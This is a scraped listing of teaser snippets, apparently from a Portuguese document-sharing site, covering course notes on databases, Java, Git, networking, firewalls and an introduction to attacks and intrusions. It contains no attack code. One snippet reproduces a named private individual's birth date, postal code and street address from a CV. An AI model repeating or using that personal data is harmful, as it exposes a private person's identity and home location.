UNIVERSIDADE FEDERAL DE SANTA MARIA - UFSM COLÉGIO AGRÍCOLA DE FREDERICO WESTPHALEN BANCO DE DADOS II BANCO DE DADOS II AULA MySQL. DISCIPLINA: Banco de Dados II PROF.: ROMULO VANZIN Data: 27/06/2014 Banco
Leia maisFernando Nunes da Silva
Fernando Nunes da Silva Dados Pessoais Data de nascimento: 02/12/1989 Idade: 22 Sexo: Masculino Cidade: Carlópolis-Pr / Brasil CEP: 86420-000 Endereço: Rua Marcos Rodrigues do Amaral Nº 224 Bairro: Centro
Leia maisImplementando uma Classe e Criando Objetos a partir dela
Análise e Desenvolvimento de Sistemas ADS Programação Orientada a Obejeto POO 3º Semestre AULA 04 - INTRODUÇÃO À PROGRAMAÇÃO ORIENTADA A OBJETO (POO) Parte: 2 Prof. Cristóvão Cunha Implementando uma Classe
Leia maisProcessamento Distribuído em Cluster do Tipo Beowulf
UNIVERSIDADE ESTADUAL PAULISTA JULIO DE MESQUITA FILHO FACULDADE DE TECNOLOGIA DA BAIXADA SANTISTA DEPARTAMENTO DE INFORMÁTICA GESTÃO DE NEGÓCIOS Processamento Distribuído em Cluster do Tipo Beowulf ALEXANDRE
Leia maisSolarWinds Kiwi Syslog Server
SolarWinds Kiwi Syslog Server Monitoramento de syslog fácil de usar e econômico O Kiwi Syslog Server oferece aos administradores de TI o software de gerenciamento mais econômico do setor. Fácil de instalar
Leia maisIntrodução ao Git. Laboratório de Programação. Luísa Lima, Pedro Vasconcelos, DCC/FCUP. Março 2015
Introdução ao Git Laboratório de Programação Luísa Lima, Pedro Vasconcelos, DCC/FCUP Março 2015 Porquê controlo de versões? Um sistema de controlo de versões (VCS) é um ferramenta integrada que possibilita
Leia maisEnergia Open Source. Semana do Gestor de Projectos - APOGEP
Semana do Gestor de Projectos - APOGEP 1 Gestão de Projectos Open Source: O caso Magalhães Semana do Gestor de Projectos Lisboa 16 de Setembro de 2009 Paulo Trezentos Paulo.Trezentos@caixamagica.pt A nossa
Leia maisRedes de Computadores
Redes de Computadores LAMP Gustavo Reis gustavo.reis@ifsudestemg.edu.br Acrônico para a combinação de Linux, Apache, MySQL e PHP ou Perl ou Python; Recentemente a letra P começou a fazer referência a Perl
Leia maisFábio Giordani. Técnico em Processamento de Dados Adm. Análise de Sistemas. Outros cursos. Coordenador Projetos e Consultoria em Infraestrutura
Fábio Giordani Técnico em Processamento de Dados Adm. Análise de Sistemas Cobol Developer (Caracter mode ;-) DBA (Oracle 7.1...) Developer (GUI) Java Outros cursos Coordenador Projetos e Consultoria em
Leia maisJPA: Persistência padronizada em Java
JPA: Persistência padronizada em Java FLÁVIO HENRIQUE CURTE Bacharel em Engenharia de Computação flaviocurte.java@gmail.com Programação Orientada a Objetos X Banco de Dados Relacionais = Paradigmas diferentes
Leia maisAS CONSULTORIA & TREINAMENTOS. www.astreinamentos.com.br. White Paper pfsense
White Paper pfsense W h i t e p a p e r - p f S e n s e 2 SUMÁRIO Visão Geral... 3 pfsense é fácil de implementar e gerenciar... 3 Hardware... 3 Recursos do pfsense... 4 Fontes... 6 W h i t e p a p e r
Leia maisCET GRSI 2011. Sistema Operativo de Rede. António Paulo Santos aps@estgf.ipp.pt
CET GRSI 2011 Sistema Operativo de Rede António Paulo Santos aps@estgf.ipp.pt O que é um S.O. de Rede? Sistema operativo que incluí: funções especiais que permitem a ligação de um computador a uma LAN.
Leia maisCONSULTORIA REMOTA BANCO DE DADOS SQL SERVER
CONSULTORIA REMOTA BANCO DE DADOS SQL SERVER Fabrício França Lima MCITP Database Administrator http://fabriciolima.net EXPERIÊNCIA Trabalho desde 2006 com SQL Server em um ambiente de banco de dados crítico
Leia maisAcesso a Bancos de Dados em Java (JDBC)
Acesso a Bancos de Dados em Java (JDBC) Jomi Fred Hübner Universidade Regional de Blumenau Departamento de Sistemas e Computação Roteiro Introdução Objetivo da JDBC Vantagens Visão geral do acesso a SGBDs
Leia maisFerramentas Livres para Monitoramento de Redes
Ferramentas Livres para Monitoramento de Redes SOBRE A AUTORA Estudante de graduação do curso de Bacharelado em Informática Biomédica da Universidade Federal do Paraná (UFPR). Atualmente participa do grupo
Leia maisEnviado dados para o PHP através de formulário
Enviado dados para o PHP através de formulário Bom galera, eu estive um tempo parado sem postar nada aqui no blog, mas prometo que vou tentar voltar a ativa. Mas vamos deixar de conversa e vamos ao que
Leia maisO QUE É O ZIMBRA? CONFIGURAÇÃO, IMPLANTAÇÃO E SUPORTE
O QUE É O ZIMBRA? Zimbra é uma solução corporativa de e-mail, calendário e colaboração criado para a nuvem. Com uma interface web totalmente redesenhada, o Zimbra oferece, atualmente, a experiência com
Leia maisSistemas Operacionais
Sistemas Operacionais Aula 01 - Introdução Edirlei Soares de Lima O que é um sistema operacional? Um computador moderno consiste em: Um ou mais processadores; Memória principal;
Leia maisAtaques e Intrusões. Invasões Trashing e Engenharia Social. Classificação de Hackers
Ataques e Intrusões Professor André Cardia andre@andrecardia.pro.br msn: andre.cardia@gmail.com Ataques e Intrusões O termo genérico para quem realiza um ataque é Hacker. Essa generalização, tem, porém,
Leia maisFIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza
FIREWALL Prof. Fabio de Jesus Souza fabiojsouza@gmail.com Professor Fabio Souza O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um
Leia maisTecnologia para Integração de Serviços. Introdução
Introdução Carlos Gustavo A. da Rocha Introdução Historicamente sistemas de comunicação foram desenvolvidos para dar suporte a um tipo específico de informação, por exemplo: Sistema telefônico: Tráfego
Leia mais